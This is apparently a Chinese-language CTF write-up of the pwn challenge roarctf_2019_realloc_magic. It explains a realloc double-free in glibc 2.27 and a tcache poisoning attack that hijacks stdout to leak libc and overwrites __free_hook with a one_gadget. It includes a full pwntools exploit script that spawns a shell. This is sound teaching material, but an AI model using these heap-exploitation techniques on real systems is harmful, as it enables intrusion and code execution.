roarctf_2019_realloc_magic
roarctf_2019_realloc_magic
这题折腾了一天才做出来,特此记录,希望以后少踩坑。
总结
做完这道题后收获如下:
realloc
功能比较多,使用需要谨慎- 可利用修改
stdout
结构体的flags
和_IO_write_base
来泄露libc
中的地址 - 利用
main_arena
来劫持stdout
结构体
题目分析
checksec
首先checksec
一下,发现保护全开:
函数分析
然后将题目拖进IDA分析,首先看main函数:
可以看到,main函数并不复杂,一个菜单加上3个选项。
menu:
re:
fr:
ba:
这里需要注意,分配内存函数使用的是realloc(void* ptr, size_t size)
,这个函数的功能很多,查看源码后发现其功能有:
- 当
ptr == nullptr
的时候,相当于malloc(size)
, 返回分配到的地址 - 当
ptr != nullptr && size == 0
的时候,相当于free(ptr)
,返回空指针 - 当
size
小于原来ptr
所指向的内存的大小时,直接缩小,返回ptr
指针。被削减的那块内存会被释放,放入对应的bins
中去 - 当
size
大于原来ptr
所指向的内存的大小时,如果原ptr
所指向的chunk
后面又足够的空间,那么直接在后面扩容,返回ptr
指针;如果后面空间不足,先释放ptr
所申请的内存,然后试图分配size
大小的内存,返回分配后的指针
可以看到,realloc
函数功能很多,也很危险,使用不当的话会引来严重的安全问题。
ba
函数可以将realloc_ptr
置为空,但是只有一次使用机会,re
函数会释放内存,但是没有置为空,存在double free
的漏洞。
题目使用的是ubuntu 18
的环境,对应的libc
的版本为2.27
,考虑使用tcache attack
。
解题思路
漏洞找到了,而一般的tcache attack
也很简单,就是直接修改tcache bin chunk
的next
指针,可以进行任意地址写。所以,初步的解题思路是:
初步解题思路
- 利用
fr
函数进行tcache dup
- 修改
chunk
的next
指针,覆盖__free_hook
,为one_gadget
- 修改后触发
fr
函数,获取shell
思路没啥问题,但是中间有几个关键的问题:
存在的问题
- 分配函数是
realloc
,所以如果指针ptr
不置为空,就无法达到malloc
的效果,ptr
所指向的chunk
要么扩大,要么缩小,要么换一片内存段进行内存分配,没有办法从bins
里面取出chunk
- 题目里似乎没有泄露地址的函数,要想往
__free_hook
写入one_gadget
需要libc
的基地址
问题解决方案
- 回忆一下刚刚总结的
realloc
函数的特点,可以发现,在上图的re
函数第7
行,将realloc_ptr
接收返回后的指针,那么如果realloc_ptr != 0 && size==0
,就会触发free(realloc_ptr)
,并且将realloc_ptr
置为0
。所以,第一个问题就解决了。 - 当题目没有泄露地址的函数或功能的时候,可以通过劫持
stdout
结构体,修改flags
和_IO_write_base
来泄露libc
中的地址,进而获取到libc
的基地址。攻击原理就不详述了,这位师傅写的很好:利用IO_2_1_stdout_泄露信息。最后需要将stdout
结构体的flags
修改为0x0FBAD1887
,将_IO_write_base
的最后一个字节覆盖为0x58
。劫持stdout
可以借助main_arena
来操作,只需要修改低字节的几个地址即可。
最终解决思路
由以上分析,可以总结出最终的解题思路为:
- 首先分配一块合适大小的内存块A。这段内存用于调用
realloc
往后面扩张,覆写tcache bin chunk
的size
和next
指针。 - 利用
re
函数将realloc_ptr
指针置为空,然后分配一块大小在small bin chunk
范围的内存块B,如大小为0x80。这是为了之后能得到unsorted bin
- 利用
re
函数将realloc_ptr
指针置为空,然后随意分配一块内存块C,用于隔开top chunk
。 - 利用
re
函数将realloc_ptr
指针置为空, 申请大小为0x80的内存,得到了刚刚释放的那块内存B。然后利用fr
函数和re
函数将realloc_ptr
释放8次,使得tcache bin
和unsorted bin
存在重合,同时realloc_ptr
所对应的chunk
的fd
和bk
指针,都指向了main_arena + 96
。 - 重新将内存块A申请回来,然后扩张,修改内存块A下面的内存块B的
size
为0x51
,这里可以修改为任意在tcache bin
范围内的值,是为了避免再次调用realloc(realloc_ptr, 0)
的时候,又改变了tcache bin
链上的指针。保证能将内存申请到stdout
附近。 - 然后申请内存到
stdout
结构体附近,修改flags
和_IO_write_base
的值。泄露出libc
的地址,计算得到__free_hook
地址和one_gadget
的地址。 - 接下来不能利用
re
来清空realloc_ptr
指针,程序会挂掉,因为绕不过检查。这里选择使用ba
函数,来将指针置为空。 - 然后重复上面的1-4步,修改
__free_hook
的值为one_gadget
,触发fr
函数,获取shell
。
编写exp
根据最终的解题思路,编写exp并调试,过程记录如下:
定义好函数:
def re(size:int=0, content:bytes=b'\x00'):
global io
io.sendlineafter(">> ", '1')
io.sendlineafter("Size?\n", str(size))
io.recvuntil("Content?\n")
if size > 0:
io.send(content)
return io.recvuntil("Done\n")
def fr():
global io
io.sendlineafter(">> ", '2')
io.recvuntil("Done\n")
restraint = 1
def ba():
global io, restraint
if restraint == 0:
return
io.sendlineafter(">> ", '666')
io.recvuntil("Done\n")
restraint -= 1
执行思路的1-4步:
re(0x30)# 首先申请/释放 为后面覆盖写做准备 A
re(0) # 释放,并把指针置为空
re(0x80) # 申请 B
re(0) # 释放置空
re(0x40) # C
re(0) # 置0 隔开topchunk
re(0x80) # 申请回来 B
for x in range(7): # 释放7次
fr()
re(0) # 得到unsorted bin 同时指针置空
看一下此时的bins
:
然后修改内存块B的size
和next
指针,劫持到stdout
,同时泄露出地址
re(0x30) # 取出来
# 修改两个字节 最低的一个字节是 0x60
des = int16(input('1 byes:'))
des = (des << 8) + 0x60
re(0x50, p64(0) * 7 + p64(0x51) + p16(des)) # 踩低字节
re(0)
re(0x80)
re(0)
msg = re(0x80, p64(0x0FBAD1887) + p64(0) * 3 + p8(0x58))
leak_addr = u64(msg[:8])
free_hook_addr = leak_addr + 0x5648
这里调试的时候可以发现,_IO_2_1_stdout_
的低两个字节和main_arena + 96
不同,理论上需要改这两个字节,实际上最后一个字节一直是0x60
,所以只需要改一个字节就行了。此处为本地调试,可以手动查看要修改的内容,然后填上去。
输入0xb7
后,修改成功:
然后分配到stdout
结构体,修改flags
等,泄露出地址:
计算一下基地址,__free_hook
的地址等:
重复一下上面的过程,在_free_hook
附近写上one_gadget
即可:
gadget = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = free_hook_addr - 0x3ed8e8 + gadget[1]
ba() # 指针置空
# 重复上面的操作,在free_hook上写one_gadget
re(0x10)
re(0)
re(0x90)
re(0)
re(0x20) # 隔开top chunk
re(0)
# 开始dump0x90
re(0x90)
for x in range(7):
fr()
re(0)
re(0x10)
re(0x50, p64(0) * 3 + p64(0x51) + p64(free_hook_addr))
re(0)
re(0x90)
re(0)
re(0x90, p64(one_gadget))
# delete
io.sendlineafter(">> ", '2')
io.sendline('cat flag')
io.interactive()
之后就可以拿到shell:
最后贴一下完整的exp
from pwn import *
from LibcSearcher import LibcSearcher
import click
import sys
import os
import time
import functools
FILENAME = '#' # 要执行的文件名
DEBUG = 1 # 是否为调试模式
TMUX = 0 # 是否开启TMUX
GDB_BREAKPOINT = None # 当tmux开启的时候,断点的设置
IP = None # 远程连接的IP
PORT = None # 远程连接的端口
LOCAL_LOG = 1 # 本地LOG是否开启
PWN_LOG_LEVEL = 'debug' # pwntools的log级别设置
STOP_FUNCTION = 1 # STOP方法是否开启
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Do pwn!')
@click.argument('filename', nargs=1, type=str, required=0, default=None)
@click.option('-d', '--debug', default=True, type=bool, nargs=1, help='Excute program at local env or remote env. Default value: True.')
@click.option('-t', '--tmux', default=False, type=bool, nargs=1, help='Excute program at tmux or not. Default value: False.')
@click.option('-gb', '--gdb-breakpoint', default=None, type=str, help='Set a gdb breakpoint while tmux is enabled, is a hex address or a function name. Default value:None')
@click.option('-i', '--ip', default=None, type=str, nargs=1, help='The remote ip addr. Default value: None.')
@click.option('-p', '--port', default=None, type=int, nargs=1, help='The remote port. Default value: None.')
@click.option('-ll', '--local-log', default=True, type=bool, nargs=1, help='Set local log enabled or not. Default value: True.')
@click.option('-pl', '--pwn-log', type=click.Choice(['debug', 'info', 'warn', 'error', 'notset']), nargs=1, default='debug', help='Set pwntools log level. Default value: debug.')
@click.option('-sf', '--stop-function', default=True, type=bool, nargs=1, help='Set stop function enabled or not. Default value: True.')
def parse_command_args(filename, debug, tmux, gdb_breakpoint, ip,
port, local_log, pwn_log, stop_function):
'''FILENAME: The filename of current directory to pwn'''
global FILENAME, DEBUG, TMUX, GDB_BREAKPOINT, IP, PORT, LOCAL_LOG, PWN_LOG_LEVEL, STOP_FUNCTION
# assign
FILENAME = filename
DEBUG = debug
TMUX = tmux
GDB_BREAKPOINT = gdb_breakpoint
IP = ip
PORT = port
LOCAL_LOG = local_log
PWN_LOG_LEVEL = pwn_log
STOP_FUNCTION = stop_function
# print('[&]', filename, debug, tmux, gdb_breakpoint, ip, port, local_log, pwn_log, stop_function)
# change
if PORT:
DEBUG = 0
TMUX = 0
STOP_FUNCTION = 0
GDB_BREAKPOINT = None
if IP is None:
IP = 'node3.buuoj.cn'
if DEBUG:
IP = None
PORT = None
# assert
assert not (FILENAME is None and PORT is None), 'para error'
assert not (FILENAME is None and DEBUG == 1), 'para error'
assert not (PORT is not None and DEBUG == 1), 'para error'
assert not (DEBUG == 0 and TMUX == 1), 'para error'
# print
click.echo('=' * 50)
click.echo(' [+] Args info:\n')
if FILENAME:
click.echo(' filename: %s' % FILENAME)
click.echo(' debug enabled: %d' % DEBUG)
click.echo(' tmux enabled: %d' % TMUX)
if GDB_BREAKPOINT:
click.echo(' gdb breakpoint: %s' % GDB_BREAKPOINT)
if IP:
click.echo(' remote ip: %s' % IP)
if PORT:
click.echo(' remote port: %d' % PORT)
click.echo(' local log enabled: %d' % LOCAL_LOG)
click.echo(' pwn log_level: %s' % PWN_LOG_LEVEL)
click.echo(' stop function enabled: %d' % STOP_FUNCTION)
click.echo('=' * 50)
parse_command_args.main(standalone_mode=False)
if len(sys.argv) == 2 and sys.argv[1] == '--help':
sys.exit(0)
if DEBUG:
io = process('./{}'.format(FILENAME))
else:
io = remote(IP, PORT)
if TMUX:
context.update(terminal=['tmux', 'splitw', '-h'])
if GDB_BREAKPOINT is None:
gdb.attach(io)
elif '0x' in GDB_BREAKPOINT:
gdb.attach(io, gdbscript='b *{}\nc\n'.format(GDB_BREAKPOINT))
else:
gdb.attach(io, gdbscript='b {}\nc\n'.format(GDB_BREAKPOINT))
if FILENAME:
cur_elf = ELF('./{}'.format(FILENAME))
print('[+] libc used ===> {}'.format(cur_elf.libc))
def LOG_ADDR(addr_name:str, addr:int):
if LOCAL_LOG:
log.success("{} ===> {}".format(addr_name, hex(addr)))
else:
pass
STOP_COUNT = 0
def STOP(idx:int=-1):
if not STOP_FUNCTION:
return
if idx != -1:
input("stop...{} {}".format(idx, proc.pidof(io)))
else:
global STOP_COUNT
input("stop...{} {}".format(STOP_COUNT, proc.pidof(io)))
STOP_COUNT += 1
int16 = functools.partial(int, base=16)
context.update(os='linux', log_level=PWN_LOG_LEVEL, arch='amd64',endian='little')
##########################################
##############以下为攻击代码###############
##########################################
# realloc的特点
def re(size:int=0, content:bytes=b'\x00'):
global io
io.sendlineafter(">> ", '1')
io.sendlineafter("Size?\n", str(size))
io.recvuntil("Content?\n")
if size > 0:
io.send(content)
return io.recvuntil("Done\n")
def fr():
global io
io.sendlineafter(">> ", '2')
io.recvuntil("Done\n")
restraint = 1
def ba():
global io, restraint
if restraint == 0:
return
io.sendlineafter(">> ", '666')
io.recvuntil("Done\n")
restraint -= 1
re(0x30)# 首先申请/释放 为后面覆盖写做准备
re(0) # 释放,并把指针置为空
re(0x80) # 申请
re(0) # 释放置空
re(0x40)
re(0) # 置0 隔开topchunk
re(0x80) # 申请回来
for x in range(7): # 释放7次
fr()
re(0) # 得到unsorted bin 同时指针置空
STOP()
re(0x30) # 取出来
# 修改两个字节 最低的一个字节是 0x60
des = int16(input('1 byes:')) # 实际打的时候,需要爆破
des = (des << 8) + 0x60
re(0x50, p64(0) * 7 + p64(0x51) + p16(des)) # 踩低字节
re(0)
re(0x80)
re(0)
msg = re(0x80, p64(0x0FBAD1887) + p64(0) * 3 + p8(0x58))
leak_addr = u64(msg[:8])
free_hook_addr = leak_addr + 0x5648
LOG_ADDR('free_hook_addr', free_hook_addr)
gadget = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = free_hook_addr - 0x3ed8e8 + gadget[1]
ba()
re(0x10)
re(0)
re(0x90)
re(0)
re(0x20)
re(0)
# 开始dump0x90
re(0x90)
for x in range(7):
fr()
re(0)
re(0x10)
re(0x50, p64(0) * 3 + p64(0x51) + p64(free_hook_addr))
re(0)
re(0x90)
re(0)
re(0x90, p64(one_gadget))
# delete
io.sendlineafter(">> ", '2')
io.sendline('cat flag')
io.interactive()
注意:在实际打的时候,需要爆破一个字节。
exp说明
这份exp是我专门用来刷BUUCTF上面的题目的,有需要的小伙伴可以拿去用。主要是利用click
包装了一下命令行参数,方便本地调试和远程攻击。
- 输入
python3 exp.py -h
可以获取帮助:
调试的时候,首先需要进入tmux
,然后可以指定是否分屏调试,以及断点设置等。目前可支持设置函数地址断点和函数名断点。
- 输入
python3 expcopy.py roarctf_2019_realloc_magic -t 1 -gb puts
是这样的:
可以开始调试,并且断在puts
函数处。
- 如果本地调通了需要远程打直接输:
python3 exp.py filename -p 25622
就可以了。这一题不能直接远程打,需要改下脚本进行爆破。
也可以自己定制命令,省去做题的时候输入命令,改脚本的时间。
roarctf_2019_realloc_magic的更多相关文章
- tcache poisoning(爆破stout获得libc并且熟练使用了realloc)
这道题目帮助我学习了realloc这个函数,是一道十分经典的题目,我会尽量的把exp的每一步都说清楚 例行检查我就不放了 讲程序放入ida中 比较简单的流程,没有show功能,所有我们需要通过爆破st ...
- IO_FILE——leak 任意读
在堆题没有show函数时,我们可以用 IO_FILE 进行leak,本文就记录一下如何实现这一手法. 拿一个输出函数 puts 来说,它在源码里的表现形式为 _IO_puts . _IO_puts ( ...
随机推荐
- Codeforces Round #650 (Div. 3) C. Social Distance (前缀和)
题意:有一排座位,要求每人之间隔\(k\)个座位坐,\(1\)代表已做,\(0\)代表空座,问最多能坐几人. 题解:我们分别从前和从后跑个前缀和,将已经有人坐的周围的位置标记,然后遍历求每一段连续的\ ...
- Selenium和ChromeDriver下载地址
Selenium 官方所有版本: https://selenium-release.storage.googleapis.com/index.html 镜像所有版本:https://npm.taoba ...
- leetcode 4 寻找两个有序数组的中位数 二分法&INT_MAX
小知识 INT_MIN在标准头文件limits.h中定义. #define INT_MAX 2147483647#define INT_MIN (-INT_MAX - 1) 题解思路 其实是类似的二分 ...
- 关于FFT的一些理解,以及如何手工计算FFT加深理解和验证正确性
总结缺少逻辑性和系统性,主要便于自己理解和记忆 关于一维FFT的 于是复系数Cn是图像傅里叶变换的yn列向量 于是我们看到最后引入,Cn这个复系数的模来表征频率波的振幅记为Sn(即简谐波叠加的数量 然 ...
- Netty(三)基于Bio和Netty 的简易版Tomcat
参考代码: https://github.com/FLGBetter/tomcat-rpc-demo
- 杭电多校HDU 6601 Keen On Everything But Triangle(主席树)题解
题意: 有\(n\)根长度不一的棍子,q次询问,求\([L,R]\)区间的棍子所能组成的周长最长的三角形.棍长\(\in [1, 1e9]\),n\(\in [1, 1e5]\). 思路: 由于不构成 ...
- 51nod1089 最长回文子串 manacher算法
0. 问题定义 最长回文子串问题:给定一个字符串,求它的最长回文子串长度. 如果一个字符串正着读和反着读是一样的,那它就是回文串.下面是一些回文串的实例: 12321 a aba abba aaaa ...
- 全方位构造免杀 webshell 小结[一]
转载自https://klionsec.github.io/2017/10/11/bypasswaf-for-webshell/ 全方位构造免杀 webshell 小结[一] 前言: 本 ...
- HLOD System
1.1 HLOD System简介 首先,HLOD System主要的目标是为了减少Draw Call.然后,进行更多的Batch批处理,从而大大提高渲染性能,减少面数和纹理,这样我们相应地节省了内存 ...
- vue 的 computed 属性在什么时间执行
vue 的 computed 属性在什么时间执行